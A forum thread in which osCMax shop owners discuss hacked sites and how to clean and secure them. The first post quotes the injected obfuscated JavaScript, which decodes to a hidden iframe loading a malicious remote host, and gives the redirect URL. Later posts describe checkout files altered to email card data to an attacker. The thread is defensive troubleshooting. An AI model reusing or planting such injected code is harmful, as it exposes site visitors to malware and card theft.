Website Recently Hacked

[deju]

My Oscmax based site was recently hacked and a javascript redirect inserted in the index.php file. A friend of mine, also with an Oscmax website (which is currently not in use), also has an oscmax site, which has also been compromised by the same hack.
If you go to http://www.cuddlyslippers.com using Internet Explorer, you can see the hack in action. It redirects to a different site after a few seconds:

Code:

http://liveinternetstatistics.ws/package/getfile.php?f=vispdf

The hacked redirect only manifests itself when viewing the site through Microsoft Internet Explorer, not Firefox, however if you view the source code, you can see the hacked code which has been added to the file:

Code:

<html><body><script  type="text/javascript">
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%6C%69%76%65%69%6E%74%65%72%6E%65%74%73%74%61%74%69%73%74%69%63%73%2E%77%73%2F%70%61%63%6B%61%67%65%2F%27%20%77%69%64%74%68%3D%27%31%27%20%68%65%69%67%68%74%3D%27%31%27%20%73%74%79%6C%65%3D%27%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%27%3E%3C%2F%69%66%72%61%6D%65%3E'));
</script></body></html>

Does anyone have an idea how the index.php has been hacked? Any help in preventing any such attacks in the future would be greatly appreciated!

[michael_s]

First,

make sure your code is the latest osCMax 2.0 RC3.0.2 code. Next, there are several exploits out there that are very sophisticated and do not rely on a direct attack on your site, but an indirect attack. Your computer gets infected with a virus/trojan/malware from visiting another infected web site. This virus sends your FTP passwords (and other passwords) to a repository where they are then used to automatically login to your FTP server, download and replace the files with infected copies. Yes, this is how it happens. I have seen it. The only way to prevent re-hacking of your site is to find and clean the infected computer that you are using, and change all your passwords.

A quick search over at osCommerce.com will find a post with a lot of details about it:
Hacker warning - osCommerce Community Support Forums

Of course, there are about a half dozen other methods that could be used if your code is not updated to RC3.0.2.

So, to recap here is what you need to do:

1. Fully scan/clean all computers that you use to access your site via FTP
2. Install a software firewall/malware-spyware blocker
3. Change all your passwords
4. Update your website's code to the latest osCMax release version.

[deju]

Hi Michael,

Thanks for the great advice. I've also come across a number of useful posts relating to oscommerce security in general, which some people might be interested in:

How to secure an Oscommerce site

How to secure your site. - osCommerce Community Support Forums

Securing Your Oscommerce Install

[tip] Securing your osCommerce install - osCommerce Forums

[heatherk]

it appears that several sites I created with oscmax 2 rc 2 and 3 were hacked. I've found at least 4, I thought that they were up to date with the security fixes, but I'll have to go back through them. The index files were updated to force people to put their dob in at checkout, and in one, that wasn't setup to accept credit cards, the paypal file was changed so that credit card information had to be put in. My question is, how do I figure out if they are pulling or getting the credit card information as it's being input - obviously on the one with the changed paypal file they must have been, otherwise why change that file. For the other three sites, they are all setup with authorize.net - if the authorize.net transaction is going through does this mean that it is ok and that the cc information is not being pulled?

[michael_s]

First, check the dates on the files. If they were modified recently, check them. Compare against a stock file and look for changes. Inspect the differences closely.

Look in checkout_process.php, and all your payment modules for changes.

[heatherk]

Yes, that is how we realized that the first site was hacked -the paypal.ipn file date was recent. The hack looks like it is similar to the one described in this post:
Website Hacked - Possible Security Breech
The checkout_process.php file was not changed. Is there a way to tell if the credit card info was being pulled - it's not stored anywhere on the site.

[heatherk]

I found the file - it was checkout_confirmation.php - it ws setup to send all the cc information to someone's email address. So, my next question is how do I go about finding all the security fixes that I need to stop this from happening? At least two of the sites that were hit had the last two security updates applied. But, I clearly have missed some security patches - other than searching through the forums under security - are they listed somewhere?

[heatherk]

More specifically, one of the sites is running oscmax v 2 rc3, and had the xss security patch and the arbitrary upload exploit fix. We are pretty certain that the hacks are not a result of malware or spyware, so where else can I look for the fix that we missed that has created this problem?

[michael_s]

Upgrade all sites to osCMax 2.0.1 stable. All security fixes are rolled into it.

Also read my blog posts regarding security holes (link to my blog in my sig.)

[wkdwich]

crap I typed a HUGE detailed response and its all gone.. why does it do that I AM logged in.. but when I went to submit it said I was not.. will redo after dinner..

and it did it again.. this time tho I put in my user pass instead of clicking back (hoping my disstertation was still there -- which it was not) and at least this posted.. more later